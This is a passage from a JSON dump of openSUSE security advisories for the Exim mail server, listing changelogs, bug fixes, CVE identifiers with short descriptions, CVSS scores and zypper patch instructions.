uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utities.\n * Fix the variables set by the gsasl authenticator.\n * Bug 2507: Modules: on handling a dynamic-module (lookups) open failure,\n only retrieve the errormessage once.\n * Bug 2501: Fix init call in the heimdal authenticator. Previously it\n adjusted the size of a major service buffer; this failed because the\n buffer was in use at the time. Change to a compile-time increase in\n the buffer size, when this authenticator is compiled into exim.\n\n - update to exim 4.93.0.4 (+fixes release)\n * Avoid costly startup code when not strictly needed. This reduces time\n for some exim process initialisations. It does mean that the logging\n of TLS configuration problems is only done for the daemon startup.\n * Early-pipelining support code is now included unless disabled in\n Makefile.\n * DKIM verification defaults no long accept sha1 hashes, to conform to\n RFC 8301. They can still be enabled, using the dkim_verify_hashes main\n option.\n * Support CHUNKING from an smtp transport using a transport_filter, when\n DKIM signing is being done. Previously a transport_filter would\n always disable CHUNKING, falling back to traditional DATA.\n * Regard command-line receipients as tainted.\n * Bug 340: Remove the daemon pid file on exit, whe due to SIGTERM.\n * Bug 2489: Fix crash in the \"pam\" expansion condition. It seems that\n the PAM library frees one of the arguments given to it, despite the\n documentation. Therefore a plain malloc must be used.\n * Bug 2491: Use tainted buffers for the transport smtp context.\n Previously\n on-stack buffers were used, resulting in a taint trap when DSN\n information copied from a received message was written into the\n buffer.\n * Bug 2493: Harden ARC verify against Outlook, whick has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file. Previously a naiive\n installation would get error messages from DMARC verify, when it hit\n the nonexistent file indicated by the default. Distros wanting DMARC\n enabled should both provide the file and set the option. Also enforce\n no DMARC verification for command-line sourced messages.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utities. The introduction of\n taint tracking also did many adjustments to string handling. Since\n then, eximon frequently terminated with an assert failure.\n * When PIPELINING, synch after every hundred or so RCPT commands sent\n and check for 452 responses. This slightly helps the inefficieny of\n doing a large alias-expansion into a recipient-limited target. The\n max_rcpt transport option still applies (and at the current default,\n will override the new feature). The check is done for either cause of\n synch, and forces a fast-retry of all 452'd recipients using a new\n MAIL FROM on the same connection. The new facility is not tunable at\n this time.\n * Fix the variables set by the gsasl authenticator. Previously a\n pointer to library live data was being used, so the results became\n garbage. Make copies while it is still usable.\n * Logging: when the deliver_time selector ise set, include the DT= field\n on delivery deferred (==) and failed (**) lines (if a delivery was\n attemtped). Previously it was only on completion (=>) lines.\n * Authentication: the gsasl driver not provides the $authN variables in\n time for the expansion of the server_scram_iter and server_scram_salt\n options.\n\n spec file cleanup to make update work\n - add docdir to spec\n\n - update to exim 4.93\n * SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n * DISABLE_TLS replaces SUPPORT_TLS\n * Bump the version for the local_scan API.\n * smtp transport option hosts_try_fastopen defaults to \"*\".\n * DNSSec is requested (not required) for all queries. (This seemes to\n ask for trouble if your resolver is a systemd-resolved.)\n * Generic router option retry_use_local_part defaults to \"true\" under\n specific pre-conditions.\n * Introduce a tainting mechanism for values read from untrusted sources.\n * Use longer file names for temporary spool files (this avoids name\n conflicts with spool on a shared file system).\n * Use dsn_from main config option (was ignored previously).\n\n - update to exim 4.92.3\n * CVE-2019-16928: fix against Heap-based buffer overflow in\n string_vformat, remote code execution seems to be possible\n\n - update to exim 4.92.2\n * CVE-2019-15846: fix against remote attackers executing arbitrary code\n as root via a trailing backslash\n\n - update to exim 4.92.1\n * CVE-2019-13917: Fixed an issue with ${sort} expansion which could allow\n remote attackers to execute other programs with root privileges\n (boo#1142207)\n\n - spec file cleanup\n * fix DANE inclusion guard condition\n * re-enable i18n and remove misleading comment\n * EXPERIMENTAL_SPF is now SUPPORT_SPF\n * DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n * ${l_header:<name>} expansion\n * ${readsocket} now supports TLS\n * \"utf8_downconvert\" option (if built with SUPPORT_I18N)\n * \"pipelining\" log_selector\n * JSON variants for ${extract } expansion\n * \"noutf8\" debug option\n * TCP Fast Open support on MacOS\n * CVE-2019-10149: Fixed a Remote Command Execution (boo#1136587)\n - add workaround patch for compile time error on missing printf format\n annotation (gnu_printf.patch)\n\n - update to 4.91\n * DEFER rather than ERROR on redis cluster MOVED response.\n * Catch and remove uninitialized value warning in exiqsumm\n * Disallow '/' characters in queue names specified for the \"queue=\" ACL\n modifier. This matches the restriction on the commandline.\n * Fix pgsql lookup for multiple result-tuples with a single column.\n Previously only the last row was returned.\n * Bug 2217: Tighten up the parsing of DKIM signature headers.\n * Bug 2215: Fix crash associated with dnsdb lookup done from DKIM ACL.\n * Fix issue with continued-connections when the DNS shifts unreliably.\n * Bug 2214: Fix SMTP responses resulting from non-accept result of MIME\n ACL.\n * The \"support for\" informational output now, which built with Content\n Scanning support, has a line for the malware scanner interfaces\n compiled in. Interface can be individually included or not at build\n time.\n * The \"aveserver\", \"kavdaemon\" and \"mksd\" interfaces are now not included\n by the template makefile \"src/EDITME\". The \"STREAM\" support for an\n older ClamAV interface method is removed.\n * Bug 2223: Fix mysql lookup returns for the no-data case (when the\n number of rows affected is given instead).\n * The runtime Berkeley DB library version is now additionally output by\n \"exim -d -bV\". Previously only the compile-time version was shown.\n * Bug 2230: Fix cutthrough routing for nonfirst messages in an initiating\n SMTP connection.\n * Bug 2229: Fix cutthrough routing for nonstandard port numbers defined\n by routers.\n * Bug 2174: A timeout on connect for a callout was also erroneously seen\n as a timeout on read on a GnuTLS initiating connection, resulting in\n the initiating connection being dropped.\n * Relax results from ACL control request to enable cutthrough, in\n unsupported situations, from error to silently (except under debug)\n ignoring.\n * Fix Buffer overflow in base64d() (CVE-2018-6789)\n * Fix bug in DKIM verify: a buffer overflow could corrupt the malloc\n metadata, resulting in a crash in free().\n * Fix broken Heimdal GSSAPI authenticator integration.\n * Bug 2113: Fix conversation closedown with the Avast malware scanner.\n * Bug 2239: Enforce non-usability of control=utf8_downconvert in the mail\n ACL.\n * Speed up macro lookups during configuration file read, by skipping non-\n macro text after a replacement (previously it was only once per line)\n and by skipping builtin macros when searching for an uppercase lead\n character.\n * DANE support moved from Experimental to mainline. The Makefile control\n for the build is renamed.\n * Fix memory leak during multi-message connections using STARTTLS.\n * Bug 2236: When a DKIM verification result is overridden by ACL, DMARC\n reported the original. Fix to report (as far as possible) the ACL\n result replacing the original.\n * Fix memory leak during multi-message connections using STARTTLS under\n OpenSSL\n * Bug 2242: Fix exim_dbmbuild to permit directoryless filenames.\n * Fix utf8_downconvert propagation through a redirect router.\n * Bug 2253: For logging delivery lines under PRDR, append the overall\n DATA response info to the (existing) per-recipient response info for\n the \"C=\" log element.\n * Bug 2251: Fix ldap lookups that return a single attribute having zero-\n length value.\n * Support Avast multiline protocol, this allows passing flags to newer\n versions of the scanner.\n * Ensure that variables possibly set during message acceptance are\n marked dead before release of memory in the daemon loop.\n * Bug 2250: Fix a longstanding bug in heavily-pipelined SMTP input (such\n as a multi-recipient message from a mailinglist manager).\n * The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is withdrawn, being\n replaced by the ${authresults } expansion.\n * Bug 2257: Fix pipe transport to not use a socket-only syscall.\n * Set a handler for SIGTERM and call exit(3) if running as PID 1. This\n allows proper process termination in container environments.\n * Bug 2258: Fix spool_wireformat in combination with LMTP transport.\n Previously the \"final dot\" had a newline after it; ensure it is CR,LF.\n * SPF: remove support for the \"spf\" ACL condition outcome values\n \"err_temp\" and \"err_perm\", deprecated since 4.83 when the RFC-defined\n words \" temperror\" and \"permerror\" were introduced.\n * Re-introduce enforcement of no cutthrough delivery on transports having\n transport-filters or DKIM-signing.\n * Cutthrough: for a final-dot response timeout (and nonunderstood\n responses) in defer=pass mode supply a 450 to the initiator.\n Previously the message would be spooled.\n * DANE: add dane_require_tls_ciphers SMTP Transport option; if unset,\n tls_require_ciphers is used as before.\n * Malware Avast: Better match the Avast multiline protocol.\n * Fix reinitialisation of DKIM logging variable between messages.\n * Bug 2255: Revert the disable of the OpenSSL session caching.\n * Add util/renew-opendmarc-tlds.sh script for safe renewal of public\n suffix list.\n * DKIM: accept Ed25519 pubkeys in SubjectPublicKeyInfo-wrapped form,\n since the IETF WG has not yet settled on that versus the original\n \"bare\" representation.\n * Fix syslog logging for syslog_timestamp=no and log_selector +millisec.\n Previously the millisecond value corrupted the output. Fix also for\n syslog_pid=no and log_selector +pid, for which the pid corrupted the\n output.\n - Replace xorg-x11-devel by individual pkgconfig() buildrequires.\n - update to 4.90.1\n * Allow PKG_CONFIG_PATH to be set in Local/Makefile and use it correctly\n during configuration. Wildcards are allowed and expanded.\n * Shorten the log line for daemon startup by collapsing adjacent sets of\n identical IP addresses on different listening ports. Will also affect\n \"exiwhat\" output.\n * Tighten up the checking in isip4 (et al): dotted-quad components\n larger than 255 are no longer allowed.\n * Default openssl_options to include +no_ticket, to reduce load on\n peers. Disable the session-cache too, which might reduce our load.\n Since we currrectly use a new context for every connection, both as\n server and client, there is no benefit for these.\n * Add $SOURCE_DATE_EPOCH support for reproducible builds, per spec at\n <https://reproducible-builds.org/specs/source-date-epoch/>.\n * Fix smtp transport use of limited max_rcpt under mua_wrapper.\n Previously the check for any unsuccessful recipients did not notice\n the limit, and erroneously found still-pending ones.\n * Pipeline CHUNKING command and data together, on kernels that support\n MSG_MORE. Only in-clear (not on TLS connections).\n * Avoid using a temporary file during transport using dkim. Unless a\n transport-filter is involved we can buffer the headers in memory for\n creating the signature, and read the spool data file once for the\n signature and again for transmission.\n * Enable use of sendfile in Linux builds as default. It was disabled in\n 4.77 as the kernel support then wasn't solid, having issues in 64bit\n mode. Now, it's been long enough. Add support for FreeBSD also.\n * Add commandline_checks_require_admin option.\n * Do pipelining under TLS.\n * For the \"sock\" variant of the malware scanner interface, accept an\n empty cmdline element to get the documented default one. Previously\n it was inaccessible.\n * Prevent repeated use of -p/-oMr\n * DKIM: enforce the DNS pubkey record \"h\" permitted-hashes optional\n field, if present.\n * DKIM: when a message has multiple signatures matching an identity\n given in dkim_verify_signers, run the dkim acl once for each.\n * Support IDNA2008.\n * The path option on a pipe transport is now expanded before use\n * Have the EHLO response advertise VRFY, if there is a vrfy ACL defined.\n - Several bug fixes\n - Fix for buffer overflow in base64decode() (boo#1079832 CVE-2018-6789)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-677=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-07T00:00:00", "type": "suse", "title": "Security update for exim (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369", "CVE-2017-16943", "CVE-2017-16944", "CVE-2018-6789", "CVE-2019-10149", "CVE-2019-13917", "CVE-2019-15846", "CVE-2019-16928", "CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2021-05-07T00:00:00", "id": "OPENSUSE-SU-2021:0677-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/4UGIR4NXSH3ADTQNJZHHL5EVSFNXRGTQ/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T12:40:27", "description": "An update that fixes 30 vulnerabilities is now available.\n\nDescription:\n\n This update for exim fixes the following issues:\n\n exim was updated to 4.94.2:\n\n security update (boo#1185631)\n\n * CVE-2020-28007: Link attack in Exim's log directory\n * CVE-2020-28008: Assorted attacks in Exim's spool directory\n * CVE-2020-28014: Arbitrary PID file creation\n * CVE-2020-28011: Heap buffer overflow in queue_run()\n * CVE-2020-28010: Heap out-of-bounds write in main()\n * CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n * CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n * CVE-2020-28015: New-line injection into spool header file (local)\n * CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n * CVE-2020-28009: Integer overflow in get_stdinput()\n * CVE-2020-28017: Integer overflow in receive_add_recipient()\n * CVE-2020-28020: Integer overflow in receive_msg()\n * CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n * CVE-2020-28021: New-line injection into spool header file (remote)\n * CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n * CVE-2020-28026: Line truncation and injection in spool_read_header()\n * CVE-2020-28019: Failure to reset function pointer after BDAT error\n * CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n * CVE-2020-28018: Use-after-free in tls-openssl.c\n * CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\n update to exim-4.94.1\n\n * Fix security issue in BDAT state confusion. Ensure we reset known-good\n where we know we need to not be reading BDAT data, as a general case\n fix, and move the places where we switch to BDAT mode until after\n various protocol state checks. Fixes CVE-2020-BDATA reported by Qualys.\n * Fix security issue in SMTP verb option parsing (CVE-2020-EXOPT)\n * Fix security issue with too many recipients on a message (to remove a\n known security problem if someone does set recipients_max to unlimited,\n or if local additions add to the recipient list). Fixes CVE-2020-RCPTL\n reported by Qualys.\n * Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in\n parse_fix_phrase()\n * Fix security issue CVE-2020-PFPSN and guard against cmdline invoker\n providing a particularly obnoxious sender full name.\n * Fix Linux security issue CVE-2020-SLCWD and guard against PATH_MAX\n better.\n\n - bring back missing exim_db.8 manual page (fixes boo#1173693)\n\n - bring in changes from current +fixes (lots of taint check fixes)\n * Bug 1329: Fix format of Maildir-format filenames to match other mail-\n related applications. Previously an \"H\" was used where available info\n says that \"M\" should be, so change to match.\n * Bug 2587: Fix pam expansion condition. Tainted values are commonly\n used as arguments, so an implementation trying to copy these into a\n local buffer was taking a taint-enforcement trap. Fix by using\n dynamically created buffers.\n * Bug 2586: Fix listcount expansion operator. Using tainted arguments\n is reasonable, eg. to count headers. Fix by using dynamically created\n buffers rather than a local. Do similar fixes for ACL actions \"dcc\",\n \"log_reject_target\", \"malware\" and \"spam\"; the arguments are expanded\n so could be handling tainted values.\n * Bug 2590: Fix -bi (newaliases). A previous code rearrangement had\n broken the (no-op) support for this sendmail command. Restore it to\n doing nothing, silently, and returning good status.\n\n update to exim 4.94\n\n * some transports now refuse to use tainted data in constructing their\n delivery location this WILL BREAK configurations which are not updated\n accordingly. In particular: any Transport use of $local_user which has\n been relying upon check_local_user far away in the Router to make it\n safe, should be updated to replace $local_user with $local_part_data.\n * Attempting to remove, in router or transport, a header name that ends\n with an asterisk (which is a standards-legal name) will now result in\n all headers named starting with the string before the asterisk being\n removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n - bring changes from current in +fixes branch\n (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee94)\n * fixes CVE-2020-12783 (boo#1171490)\n * Regard command-line recipients as tainted.\n * Bug 2489: Fix crash in the \"pam\" expansion condition.\n * Use tainted buffers for the transport smtp context.\n * Bug 2493: Harden ARC verify against Outlook, which has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utities.\n * Fix the variables set by the gsasl authenticator.\n * Bug 2507: Modules: on handling a dynamic-module (lookups) open failure,\n only retrieve the errormessage once.\n * Bug 2501: Fix init call in the heimdal authenticator. Previously it\n adjusted the size of a major service buffer; this failed because the\n buffer was in use at the time. Change to a compile-time increase in\n the buffer size, when this authenticator is compiled into exim.\n\n - don't create logfiles during install\n * fixes CVE-2020-8015 (boo#1154183)\n\n - add a spec-file workaround for boo#1160726\n\n - update to exim 4.93.0.4 (+fixes release)\n * Avoid costly startup code when not strictly needed. This reduces time\n for some exim process initialisations. It does mean that the logging\n of TLS configuration problems is only done for the daemon startup.\n * Early-pipelining support code is now included unless disabled in\n Makefile.\n * DKIM verification defaults no long accept sha1 hashes, to conform to\n RFC 8301. They can still be enabled, using the dkim_verify_hashes main\n option.\n * Support CHUNKING from an smtp transport using a transport_filter, when\n DKIM signing is being done. Previously a transport_filter would\n always disable CHUNKING, falling back to traditional DATA.\n * Regard command-line receipients as tainted.\n * Bug 340: Remove the daemon pid file on exit, whe due to SIGTERM.\n * Bug 2489: Fix crash in the \"pam\" expansion condition. It seems that\n the PAM library frees one of the arguments given to it, despite the\n documentation. Therefore a plain malloc must be used.\n * Bug 2491: Use tainted buffers for the transport smtp context.\n Previously\n on-stack buffers were used, resulting in a taint trap when DSN\n information copied from a received message was written into the\n buffer.\n * Bug 2493: Harden ARC verify against Outlook, whick has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file. Previously a naiive\n installation would get error messages from DMARC verify, when it hit\n the nonexistent file indicated by the default. Distros wanting DMARC\n enabled should both provide the file and set the option. Also enforce\n no DMARC verification for command-line sourced messages.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utities. The introduction of\n taint tracking also did many adjustments to string handling. Since\n then, eximon frequently terminated with an assert failure.\n * When PIPELINING, synch after every hundred or so RCPT commands sent\n and check for 452 responses. This slightly helps the inefficieny of\n doing a large alias-expansion into a recipient-limited target. The\n max_rcpt transport option still applies (and at the current default,\n will override the new feature). The check is done for either cause of\n synch, and forces a fast-retry of all 452'd recipients using a new\n MAIL FROM on the same connection. The new facility is not tunable at\n this time.\n * Fix the variables set by the gsasl authenticator. Previously a\n pointer to library live data was being used, so the results became\n garbage. Make copies while it is still usable.\n * Logging: when the deliver_time selector ise set, include the DT= field\n on delivery deferred (==) and failed (**) lines (if a delivery was\n attemtped). Previously it was only on completion (=>) lines.\n * Authentication: the gsasl driver not provides the $authN variables in\n time for the expansion of the server_scram_iter and server_scram_salt\n options.\n\n spec file cleanup to make update work\n - add docdir to spec\n\n - update to exim 4.93\n * SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n * DISABLE_TLS replaces SUPPORT_TLS\n * Bump the version for the local_scan API.\n * smtp transport option hosts_try_fastopen defaults to \"*\".\n * DNSSec is requested (not required) for all queries. (This seemes to\n ask for trouble if your resolver is a systemd-resolved.)\n * Generic router option retry_use_local_part defaults to \"true\" under\n specific pre-conditions.\n * Introduce a tainting mechanism for values read from untrusted sources.\n * Use longer file names for temporary spool files (this avoids name\n conflicts with spool on a shared file system).\n * Use dsn_from main config option (was ignored previously).\n\n - update to exim 4.92.3\n * CVE-2019-16928: fix against Heap-based buffer overflow in\n string_vformat, remote code execution seems to be possible\n\n - update to exim 4.92.2\n * CVE-2019-15846: fix against remote attackers executing arbitrary code\n as root via a trailing backslash\n\n - update to exim 4.92.1\n * CVE-2019-13917: Fixed an issue with ${sort} expansion which could allow\n remote attackers to execute other programs with root privileges\n (boo#1142207)\n\n - spec file cleanup\n * fix DANE inclusion guard condition\n * re-enable i18n and remove misleading comment\n * EXPERIMENTAL_SPF is now SUPPORT_SPF\n * DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n * ${l_header:<name>} expansion\n * ${readsocket} now supports TLS\n * \"utf8_downconvert\" option (if built with SUPPORT_I18N)\n * \"pipelining\" log_selector\n * JSON variants for ${extract } expansion\n * \"noutf8\" debug option\n * TCP Fast Open support on MacOS\n * CVE-2019-10149: Fixed a Remote Command Execution (boo#1136587)\n - add workaround patch for compile time error on missing printf format\n annotation (gnu_printf.patch)\n\n - update to 4.91\n * DEFER rather than ERROR on redis cluster MOVED response.\n * Catch and remove uninitialized value warning in exiqsumm\n * Disallow '/' characters in queue names specified for the \"queue=\" ACL\n modifier. This matches the restriction on the commandline.\n * Fix pgsql lookup for multiple result-tuples with a single column.\n Previously only the last row was returned.\n * Bug 2217: Tighten up the parsing of DKIM signature headers.\n * Bug 2215: Fix crash associated with dnsdb lookup done from DKIM ACL.\n * Fix issue with continued-connections when the DNS shifts unreliably.\n * Bug 2214: Fix SMTP responses resulting from non-accept result of MIME\n ACL.\n * The \"support for\" informational output now, which built with Content\n Scanning support, has a line for the malware scanner interfaces\n compiled in. Interface can be individually included or not at build\n time.\n * The \"aveserver\", \"kavdaemon\" and \"mksd\" interfaces are now not included\n by the template makefile \"src/EDITME\". The \"STREAM\" support for an\n older ClamAV interface method is removed.\n * Bug 2223: Fix mysql lookup returns for the no-data case (when the\n number of rows affected is given instead).\n * The runtime Berkeley DB library version is now additionally output by\n \"exim -d -bV\". Previously only the compile-time version was shown.\n * Bug 2230: Fix cutthrough routing for nonfirst messages in an initiating\n SMTP connection.\n * Bug 2229: Fix cutthrough routing for nonstandard port numbers defined\n by routers.\n * Bug 2174: A timeout on connect for a callout was also erroneously seen\n as a timeout on read on a GnuTLS initiating connection, resulting in\n the initiating connection being dropped.\n * Relax results from ACL control request to enable cutthrough, in\n unsupported situations, from error to silently (except under debug)\n ignoring.\n * Fix Buffer overflow in base64d() (CVE-2018-6789)\n * Fix bug in DKIM verify: a buffer overflow could corrupt the malloc\n metadata, resulting in a crash in free().\n * Fix broken Heimdal GSSAPI authenticator integration.\n * Bug 2113: Fix conversation closedown with the Avast malware scanner.\n * Bug 2239: Enforce non-usability of control=utf8_downconvert in the mail\n ACL.\n * Speed up macro lookups during configuration file read, by skipping non-\n macro text after a replacement (previously it was only once per line)\n and by skipping builtin macros when searching for an uppercase lead\n character.\n * DANE support moved from Experimental to mainline. The Makefile control\n for the build is renamed.\n * Fix memory leak during multi-message connections using STARTTLS.\n * Bug 2236: When a DKIM verification result is overridden by ACL, DMARC\n reported the original. Fix to report (as far as possible) the ACL\n result replacing the original.\n * Fix memory leak during multi-message connections using STARTTLS under\n OpenSSL\n * Bug 2242: Fix exim_dbmbuild to permit directoryless filenames.\n * Fix utf8_downconvert propagation through a redirect router.\n * Bug 2253: For logging delivery lines under PRDR, append the overall\n DATA response info to the (existing) per-recipient response info for\n the \"C=\" log element.\n * Bug 2251: Fix ldap lookups that return a single attribute having zero-\n length value.\n * Support Avast multiline protocol, this allows passing flags to newer\n versions of the scanner.\n * Ensure that variables possibly set during message acceptance are\n marked dead before release of memory in the daemon loop.\n * Bug 2250: Fix a longstanding bug in heavily-pipelined SMTP input (such\n as a multi-recipient message from a mailinglist manager).\n * The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is withdrawn, being\n replaced by the ${authresults } expansion.\n * Bug 2257: Fix pipe transport to not use a socket-only syscall.\n * Set a handler for SIGTERM and call exit(3) if running as PID 1. This\n allows proper process termination in container environments.\n * Bug 2258: Fix spool_wireformat in combination with LMTP transport.\n Previously the \"final dot\" had a newline after it; ensure it is CR,LF.\n * SPF: remove support for the \"spf\" ACL condition outcome values\n \"err_temp\" and \"err_perm\", deprecated since 4.83 when the RFC-defined\n words \" temperror\" and \"permerror\" were introduced.\n * Re-introduce enforcement of no cutthrough delivery on transports having\n transport-filters or DKIM-signing.\n * Cutthrough: for a final-dot response timeout (and nonunderstood\n responses) in defer=pass mode supply a 450 to the initiator.\n Previously the message would be spooled.\n * DANE: add dane_require_tls_ciphers SMTP Transport option; if unset,\n tls_require_ciphers is used as before.\n * Malware Avast: Better match the Avast multiline protocol.\n * Fix reinitialisation of DKIM logging variable between messages.\n * Bug 2255: Revert the disable of the OpenSSL session caching.\n * Add util/renew-opendmarc-tlds.sh script for safe renewal of public\n suffix list.\n * DKIM: accept Ed25519 pubkeys in SubjectPublicKeyInfo-wrapped form,\n since the IETF WG has not yet settled on that versus the original\n \"bare\" representation.\n * Fix syslog logging for syslog_timestamp=no and log_selector +millisec.\n Previously the millisecond value corrupted the output. Fix also for\n syslog_pid=no and log_selector +pid, for which the pid corrupted the\n output.\n\n - Replace xorg-x11-devel by individual pkgconfig() buildrequires.\n\n - update to 4.90.1\n * Allow PKG_CONFIG_PATH to be set in Local/Makefile and use it correctly\n during configuration. Wildcards are allowed and expanded.\n * Shorten the log line for daemon startup by collapsing adjacent sets of\n identical IP addresses on different listening ports. Will also affect\n \"exiwhat\" output.\n * Tighten up the checking in isip4 (et al): dotted-quad components\n larger than 255 are no longer allowed.\n * Default openssl_options to include +no_ticket, to reduce load on\n peers. Disable the session-cache too, which might reduce our load.\n Since we currrectly use a new context for every connection, both as\n server and client, there is no benefit for these.\n * Add $SOURCE_DATE_EPOCH support for reproducible builds, per spec at\n <https://reproducible-builds.org/specs/source-date-epoch/>.\n * Fix smtp transport use of limited max_rcpt under mua_wrapper.\n Previously the check for any unsuccessful recipients did not notice\n the limit, and erroneously found still-pending ones.\n * Pipeline CHUNKING command and data together, on kernels that support\n MSG_MORE. Only in-clear (not on TLS connections).\n * Avoid using a temporary file during transport using dkim. Unless a\n transport-filter is involved we can buffer the headers in memory for\n creating the signature, and read the spool data file once for the\n signature and again for transmission.\n * Enable use of sendfile in Linux builds as default. It was disabled in\n 4.77 as the kernel support then wasn't solid, having issues in 64bit\n mode. Now, it's been long enough. Add support for FreeBSD also.\n * Add commandline_checks_require_admin option.\n * Do pipelining under TLS.\n * For the \"sock\" variant of the malware scanner interface, accept an\n empty cmdline element to get the documented default one. Previously\n it was inaccessible.\n * Prevent repeated use of -p/-oMr\n * DKIM: enforce the DNS pubkey record \"h\" permitted-hashes optional\n field, if present.\n * DKIM: when a message has multiple signatures matching an identity\n given in dkim_verify_signers, run the dkim acl once for each.\n * Support IDNA2008.\n * The path option on a pipe transport is now expanded before use\n * Have the EHLO response advertise VRFY, if there is a vrfy ACL defined.\n - Several bug fixes\n - Fix for buffer overflow in base64decode() (boo#1079832 CVE-2018-6789)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Backports SLE-15-SP1:\n\n zypper in -t patch openSUSE-2021-753=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-20T00:00:00", "type": "suse", "title": "Security update for exim (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369", "CVE-2017-16943", "CVE-2017-16944", "CVE-2018-6789", "CVE-2019-10149", "CVE-2019-13917", "CVE-2019-15846", "CVE-2019-16928", "CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", 